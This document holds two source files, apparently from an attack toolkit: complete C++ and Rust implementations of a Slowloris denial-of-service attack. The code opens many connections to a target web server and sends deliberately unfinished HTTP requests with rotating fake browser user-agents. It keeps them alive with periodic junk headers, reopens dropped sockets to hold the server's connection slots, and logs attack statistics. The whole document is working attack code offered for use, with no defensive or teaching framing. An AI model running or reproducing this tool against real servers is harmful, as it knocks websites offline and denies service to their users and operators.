File: cpp_version/attacks/slowloris.cpp
#include "slowloris.hpp"
#include "config.hpp"

#include <sstream>
#include <cstring>
#include <algorithm>

#ifdef _WIN32
    #pragma comment(lib, "ws2_32.lib")
    #define CLOSE_SOCKET closesocket
#else
    #include <fcntl.h>
    #include <errno.h>
    #define CLOSE_SOCKET ::close
#endif

static const std::vector<std::string> SLOWLORIS_USER_AGENTS = {
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/120.0.0.0",
    "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15"
};

Slowloris::Slowloris(const std::string& target, int duration, int threads, int port,
                     std::function<void(const std::string&)> callback)
    : target_(target)
    , duration_(duration)
    , num_sockets_(threads)
    , port_(port)
    , callback_(callback)
{
}

Slowloris::~Slowloris() {
    stop();
}

std::string Slowloris::resolve_host(const std::string& hostname) {
    struct addrinfo hints{}, *res = nullptr;
    hints.ai_family = AF_INET;
    hints.ai_socktype = SOCK_STREAM;

    if (getaddrinfo(hostname.c_str(), nullptr, &hints, &res) != 0 || !res) {
        return "";
    }

    char ip[INET_ADDRSTRLEN];
    auto* addr = reinterpret_cast<struct sockaddr_in*>(res->ai_addr);
    inet_ntop(AF_INET, &addr->sin_addr, ip, sizeof(ip));
    freeaddrinfo(res);
    return std::string(ip);
}

SOCKET Slowloris::create_connection(const std::string& ip) {
    SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET) return INVALID_SOCKET;

#ifdef _WIN32
    DWORD timeout_ms = 10000;
    setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (const char*)&timeout_ms, sizeof(timeout_ms));
    setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (const char*)&timeout_ms, sizeof(timeout_ms));
#else
    struct timeval tv;
    tv.tv_sec = 10;
    tv.tv_usec = 0;
    setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv));
    setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv));
#endif

    struct sockaddr_in server{};
    server.sin_family = AF_INET;
    server.sin_port = htons(static_cast<uint16_t>(port_));
    inet_pton(AF_INET, ip.c_str(), &server.sin_addr);

    if (connect(sock, (struct sockaddr*)&server, sizeof(server)) < 0) {
        CLOSE_SOCKET(sock);
        return INVALID_SOCKET;
    }

    return sock;
}

void Slowloris::send_partial_header(SOCKET sock) {
    thread_local std::mt19937 rng(std::random_device{}());
    std::uniform_int_distribution<size_t> ua_dist(0, SLOWLORIS_USER_AGENTS.size() - 1);

    std::string ua = SLOWLORIS_USER_AGENTS[ua_dist(rng)];

    std::ostringstream header;
    header << "GET /?q=" << rng() << " HTTP/1.1\r\n"
           << "Host: " << target_ << "\r\n"
           << "User-Agent: " << ua << "\r\n"
           << "Accept-Language: en-US,en;q=0.5\r\n";
    // Intentionally not sending final \r\n to keep connection open

    std::string hdr = header.str();
    send(sock, hdr.c_str(), static_cast<int>(hdr.size()), 0);
}

void Slowloris::keep_alive_worker() {
    thread_local std::mt19937 rng(std::random_device{}());

    while (!stop_flag_.load()) {
        // Sleep ~10 seconds, checking stop flag periodically
        for (int i = 0; i < 100 && !stop_flag_.load(); i++) {
            std::this_thread::sleep_for(std::chrono::milliseconds(100));
        }

        if (stop_flag_.load()) break;

        std::lock_guard<std::mutex> lock(sockets_mtx_);

        // Send keep-alive header on all active sockets
        auto it = sockets_.begin();
        while (it != sockets_.end()) {
            std::uniform_int_distribution<int> dist(1, 5000);
            std::string header = "X-a: " + std::to_string(dist(rng)) + "\r\n";
            int result = send(*it, header.c_str(), static_cast<int>(header.size()), 0);
            if (result < 0) {
                // Connection died, remove it
                CLOSE_SOCKET(*it);
                it = sockets_.erase(it);
                connections_active_--;
            } else {
                ++it;
            }
        }
    }
}

std::map<std::string, std::string> Slowloris::run() {
    stop_flag_.store(false);
    connections_opened_.store(0);
    connections_active_.store(0);

    if (callback_) {
        callback_("Starting Slowloris attack on " + target_ + ":" + std::to_string(port_));
    }

    std::string ip = resolve_host(target_);
    if (ip.empty()) {
        std::map<std::string, std::string> stats;
        stats["error"] = "Failed to resolve host: " + target_;
        return stats;
    }

    auto start_time = std::chrono::steady_clock::now();

    // Open initial connections
    for (int i = 0; i < num_sockets_ && !stop_flag_.load(); i++) {
        SOCKET sock = create_connection(ip);
        if (sock != INVALID_SOCKET) {
            send_partial_header(sock);
            std::lock_guard<std::mutex> lock(sockets_mtx_);
            sockets_.push_back(sock);
            connections_opened_++;
            connections_active_++;
        }
    }

    if (callback_) {
        callback_("Opened " + std::to_string(connections_active_.load()) + " connections");
    }

    // Start keep-alive thread
    std::thread keep_alive_thread(&Slowloris::keep_alive_worker, this);

    // Main loop: maintain connections and replenish dead ones
    while (!stop_flag_.load()) {
        auto elapsed = std::chrono::steady_clock::now() - start_time;
        if (std::chrono::duration_cast<std::chrono::seconds>(elapsed).count() >= duration_) {
            stop_flag_.store(true);
            break;
        }

        // Replenish dead connections
        {
            std::lock_guard<std::mutex> lock(sockets_mtx_);
            int needed = num_sockets_ - static_cast<int>(sockets_.size());
            for (int i = 0; i < needed && !stop_flag_.load(); i++) {
                SOCKET sock = create_connection(ip);
                if (sock != INVALID_SOCKET) {
                    send_partial_header(sock);
                    sockets_.push_back(sock);
                    connections_opened_++;
                    connections_active_++;
                }
            }
        }

        std::this_thread::sleep_for(std::chrono::seconds(1));
    }

    stop_flag_.store(true);

    if (keep_alive_thread.joinable()) {
        keep_alive_thread.join();
    }

    // Close all sockets
    {
        std::lock_guard<std::mutex> lock(sockets_mtx_);
        for (auto& s : sockets_) {
            CLOSE_SOCKET(s);
        }
        sockets_.clear();
    }

    auto end_time = std::chrono::steady_clock::now();
    auto total_seconds = std::chrono::duration_cast<std::chrono::seconds>(end_time - start_time).count();
    if (total_seconds == 0) total_seconds = 1;

    std::map<std::string, std::string> stats;
    stats["attack_type"] = "Slowloris";
    stats["target"] = target_ + ":" + std::to_string(port_);
    stats["duration"] = std::to_string(total_seconds) + "s";
    stats["sockets_requested"] = std::to_string(num_sockets_);
    stats["connections_opened"] = std::to_string(connections_opened_.load());
    stats["peak_active_connections"] = std::to_string(connections_active_.load());

    return stats;
}

void Slowloris::stop() {
    stop_flag_.store(true);
    for (auto& t : threads_) {
        if (t.joinable()) t.join();
    }
    threads_.clear();

    std::lock_guard<std::mutex> lock(sockets_mtx_);
    for (auto& s : sockets_) {
        CLOSE_SOCKET(s);
    }
    sockets_.clear();
}

File: rust_version/src/attacks/slowloris.rs
use std::collections::HashMap;
use std::io::Write;
use std::net::TcpStream;
use std::sync::atomic::{AtomicBool, AtomicU64, Ordering};
use std::sync::{Arc, Mutex};
use std::time::{Duration, Instant};

use rand::Rng;

const USER_AGENTS: &[&str] = &[
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 Safari/605.1.15",
    "Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 Mobile/15E148",
];

pub struct Slowloris {
    target: String,
    duration: u64,
    threads: u32,
    port: u16,
    stop_flag: Arc<AtomicBool>,
    connections_opened: Arc<AtomicU64>,
    connections_active: Arc<AtomicU64>,
    callback: Arc<dyn Fn(&str) + Send + Sync>,
}

impl Slowloris {
    pub fn new(
        target: String,
        duration: u64,
        threads: u32,
        port: u16,
        callback: Arc<dyn Fn(&str) + Send + Sync>,
    ) -> Self {
        Self {
            target,
            duration,
            threads,
            port,
            stop_flag: Arc::new(AtomicBool::new(false)),
            connections_opened: Arc::new(AtomicU64::new(0)),
            connections_active: Arc::new(AtomicU64::new(0)),
            callback,
        }
    }

    pub fn stop(&self) {
        self.stop_flag.store(true, Ordering::SeqCst);
    }

    pub fn run(&self) -> HashMap<String, String> {
        let addr = format!("{}:{}", self.target, self.port);

        (self.callback)(&format!(
            "[*] Launching Slowloris on {} with {} sockets for {}s",
            addr, self.threads, self.duration
        ));

        let start = Instant::now();
        let dur = Duration::from_secs(self.duration);

        // Shared pool of live connections
        let sockets: Arc<Mutex<Vec<TcpStream>>> = Arc::new(Mutex::new(Vec::new()));

        // Phase 1: Open initial connections
        (self.callback)("[*] Opening initial connections...");
        self.open_connections(&addr, &sockets);

        // Phase 2: Keep-alive loop - send partial headers every ~10 seconds
        let stop = self.stop_flag.clone();
        let active = self.connections_active.clone();
        let opened = self.connections_opened.clone();
        let socks = sockets.clone();
        let cb = self.callback.clone();
        let target_addr = addr.clone();
        let num_threads = self.threads;

        let keepalive_handle = std::thread::spawn(move || {
            let mut rng = rand::thread_rng();
            while !stop.load(Ordering::Relaxed) && start.elapsed() < dur {
                // Send keep-alive header on each socket
                {
                    let mut pool = socks.lock().unwrap();
                    let mut alive = Vec::new();
                    for mut sock in pool.drain(..) {
                        let val: u32 = rng.gen_range(1..10000);
                        let header = format!("X-a: {}\r\n", val);
                        if sock.write_all(header.as_bytes()).is_ok() {
                            alive.push(sock);
                        }
                    }
                    let count = alive.len() as u64;
                    active.store(count, Ordering::Relaxed);
                    *pool = alive;
                }

                // Try to re-open dead connections back to target count
                {
                    let current = {
                        let pool = socks.lock().unwrap();
                        pool.len() as u32
                    };
                    if current < num_threads {
                        let to_open = num_threads - current;
                        for _ in 0..to_open {
                            if stop.load(Ordering::Relaxed) || start.elapsed() >= dur {
                                break;
                            }
                            if let Ok(mut stream) =
                                TcpStream::connect_timeout(
                                    &target_addr.parse().unwrap(),
                                    Duration::from_secs(4),
                                )
                            {
                                let _ = stream.set_read_timeout(Some(Duration::from_secs(10)));
                                let _ = stream.set_write_timeout(Some(Duration::from_secs(10)));
                                let ua = USER_AGENTS[rng.gen_range(0..USER_AGENTS.len())];
                                let request = format!(
                                    "GET /?{} HTTP/1.1\r\nHost: {}\r\nUser-Agent: {}\r\nAccept-Language: en-US,en;q=0.5\r\n",
                                    rng.gen_range(0..2000),
                                    target_addr,
                                    ua
                                );
                                if stream.write_all(request.as_bytes()).is_ok() {
                                    opened.fetch_add(1, Ordering::Relaxed);
                                    let mut pool = socks.lock().unwrap();
                                    pool.push(stream);
                                }
                            }
                        }
                        let new_count = {
                            let pool = socks.lock().unwrap();
                            pool.len() as u64
                        };
                        active.store(new_count, Ordering::Relaxed);
                    }
                }

                let elapsed = start.elapsed().as_secs();
                let a = active.load(Ordering::Relaxed);
                let o = opened.load(Ordering::Relaxed);
                cb(&format!(
                    "[STATS] Active: {} | Total opened: {} | Elapsed: {}s",
                    a, o, elapsed
                ));

                // Sleep ~10 seconds (check stop flag every second)
                for _ in 0..10 {
                    if stop.load(Ordering::Relaxed) || start.elapsed() >= dur {
                        break;
                    }
                    std::thread::sleep(Duration::from_secs(1));
                }
            }
        });

        let _ = keepalive_handle.join();
        self.stop_flag.store(true, Ordering::SeqCst);

        // Close all remaining sockets
        {
            let mut pool = sockets.lock().unwrap();
            pool.clear();
        }

        let total_opened = self.connections_opened.load(Ordering::Relaxed);
        let final_active = self.connections_active.load(Ordering::Relaxed);
        let elapsed = start.elapsed().as_secs_f64();

        let mut stats = HashMap::new();
        stats.insert("connections_opened".into(), total_opened.to_string());
        stats.insert("connections_active".into(), final_active.to_string());
        stats.insert("duration".into(), format!("{:.1}s", elapsed));
        stats
    }

    fn open_connections(&self, addr: &str, sockets: &Arc<Mutex<Vec<TcpStream>>>) {
        let mut rng = rand::thread_rng();
        let parsed_addr: std::net::SocketAddr = addr.parse().unwrap();

        for i in 0..self.threads {
            if self.stop_flag.load(Ordering::Relaxed) {
                break;
            }
            match TcpStream::connect_timeout(&parsed_addr, Duration::from_secs(4)) {
                Ok(mut stream) => {
                    let _ = stream.set_read_timeout(Some(Duration::from_secs(10)));
                    let _ = stream.set_write_timeout(Some(Duration::from_secs(10)));

                    let ua = USER_AGENTS[rng.gen_range(0..USER_AGENTS.len())];
                    let request = format!(
                        "GET /?{} HTTP/1.1\r\nHost: {}\r\nUser-Agent: {}\r\nAccept-Language: en-US,en;q=0.5\r\n",
                        rng.gen_range(0..2000),
                        addr,
                        ua
                    );
                    if stream.write_all(request.as_bytes()).is_ok() {
                        self.connections_opened.fetch_add(1, Ordering::Relaxed);
                        let mut pool = sockets.lock().unwrap();
                        pool.push(stream);
                    }
                }
                Err(_) => {
                    // Connection failed, continue
                }
            }

            if (i + 1) % 50 == 0 {
                (self.callback)(&format!("[*] Opened {} connections...", i + 1));
            }
        }

        let count = {
            let pool = sockets.lock().unwrap();
            pool.len() as u64
        };
        self.connections_active.store(count, Ordering::Relaxed);
        (self.callback)(&format!(
            "[*] Initial connections established: {}",
            count
        ));
    }
}
